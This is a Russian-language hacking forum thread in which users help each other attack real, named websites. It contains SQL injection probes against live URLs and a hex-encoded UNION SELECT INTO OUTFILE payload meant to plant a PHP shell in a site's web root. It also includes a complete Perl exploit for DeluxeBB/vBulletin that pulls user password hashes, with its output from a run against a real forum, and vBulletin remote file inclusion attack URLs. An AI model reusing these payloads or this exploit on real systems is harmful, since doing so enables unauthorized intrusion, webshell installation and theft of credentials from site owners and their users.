Чёт не разберусь никак с одной скулей...Может кто справится!? Code: http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru' http://micropig.com/microlink/category/58/start/3'
помойму там жосткий фильтр стоит. ничего у меня не получается. ты уверен чот она там есть?? на это тоже ругается: PHP: http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d
Как видишь, ошибка мускула есть логично предположить, что это инъекция Я вот тоже час парюсь, уже просто интересно стало, можно ли чего извлечь... возможно это инъекция после лимита, т.к. Code: http://micropig.com/microlink/category/58/start/3,1,1,2 -error http://micropig.com/microlink/category/58/start/3 offset 1 /* -no error http://micropig.com/microlink/category/58/start/3,1/* -no error
Я про этот случай: http://micropig.com/microlink/?srch=2&start=30&searchtext=123' Нет там иньекта, он ругается каждый раз когда не может чтото найти, например: http://micropig.com/microlink/?srch=2&start=30&searchtext=123sdfsd
Ситуация такая, на серве мэджик квотес = он , то есть кавычки фильтруются, но можно провернуть скуль инъекцию, мне надо залить шелл ( файл прив есть, путь есть ), но как указать путь если он в кавычках ('/home/site/public_html/shell.php') ? Я помню, что Scipio писал как это можно обойти, но я тогда не врубился, может кто объяснит ?
AFoST Наличие ошибки не означает наличие инъекции. Инъекция это возможность влиять на запрос Сдесь: _http://micropig.com/microlink/?srch=2&start=30&searchtext=123 такой возможности нет Сдесь: _http://micropig.com/microlink/category/58/start/3 тройка это limit 3 т.е. можно повлиять так как ты описал: _http://micropig.com/microlink/category/58/start/3,1/* limit 3 offset 1(offset по умолчанию = 37) Но ничего путного от этой инъекции (в mysql) не добиться
0nep@t0p Скинь сюда сайт, чтобы метод Scipio работал данные из первого запроса должны попадать во второй, тогда будет возможность залить шелл
2 l-l00K Запрос такой: -16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* То есть мне надо составить такой запрос - -16+union+select+1,0x2D313620756E696F6E2073656C65637420273C3F70687020706870696E666F28293B203F3E2C322066726F6D206D7973716C2E7573657220696E746F206F757466696C6520272F686F6D652F736974652F7075626C69635F68746D6C2F7368656C6C2E706870272F2A,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* Где в хексе прописано - -16 union select '<?php phpinfo(); ?>,2 from mysql.user into outfile '/home/site/public_html/shell.php'/* Правильно ?
А ты уверен что данные из 2-рого поля попадают в другой запрос и что в другом запросе 2 поля? Если это так, то по сюжету должно прокатить
Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал
Подставь 0x27 по очереди в каждое поле, если появится ошибка, значит попадают, разумеется если вывод ошибок не выключен
Я говорю что вообще это вожможно) Данные попадают во второй запрос если там используются. Количество полей зависит только от их количества в запросе. И вообще не у одного Scipio хватило мозга придумать такое, раньше такое тоже пользовали.
Ребятки подскажите, пожалуйста, почему не работает Exploit. Exploit… Code: #!/usr/bin/perl use IO::Socket; print q{ ###################################################### # DeluxeBB Remote SQL Injection Exploit # # vbulletin Remote SQL Injection Exploit # # // SekoMirza // Turkish Hackerz # ###################################################### }; if (!$ARGV[2]) { print q{ Usage: perl dbbxpl.pl host /directory/ victim_userid perl dbbxpl.pl www.somesite.com /forum/ 1 }; } $server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print "------------------------------------------------------------------------------------------------\r\n"; print "[>] SERVER: $server\r\n"; print "[>] DIR: $dir\r\n"; print "[>] USERID: $user\r\n"; print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users% 20WHERE%20(uid='".$user ; print "[~] PREPARE TO CONNECT...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED "; print "[~] SENDING QUERY... "; print $socket "GET $path HTTP/1.1 "; print $socket "Host: $server "; print $socket "Accept: */* "; print $socket "Connection: close "; print "[+] DONE! "; print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "Password Hash is: ".$1." "; print "--------------------------------------------------------------------------------------\r\n"; } exit(); } } print "------------------------------------------------------------------------------------------------\r\n"; ######################################################### #Shoutz: # # # # My Sweet -> Caramel # # For Mp3s -> Hypn0sis # # For Support -> [WwW.StarHack.Org] # # My Bro -> PhantomOrchid # # My Preceptor -> Earnk Kazno # ######################################################### C:\usr\bin>dbbxpl.pl www.forum.profiforex.ru / 24 ###################################################### # DeluxeBB Remote SQL Injection Exploit # # vbulletin Remote SQL Injection Exploit # # // SekoMirza // Turkish Hackerz # ###################################################### -------------------------------------------------------------------------------- ---------------- [>] SERVER: www.forum.profiforex.ru [>] DIR: / [>] USERID: 24 -------------------------------------------------------------------------------- ---------------- [~] PREPARE TO CONNECT... [+] CONNECTED [~] SENDING QUERY... [+] DONE! --[ REPORT ]----------------------- ------------------------------------------------------------- -------------------------------------------------------------------------------- ---------------- Вернее он работает, но как-то не информативно.
А проверить как как-то можно? Пытался вручную, но что-то не получается! Может и правда не бажный!? Надо искать какую-то альтернативу!
Так тоже пытался… Только вот что-то не очень получается… Или это у меня руки кривые…!? vBulletin v3.6.5 Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: [site]/vb/includes/functions.php?classfile=[Shell-Attack] [site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack] [site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]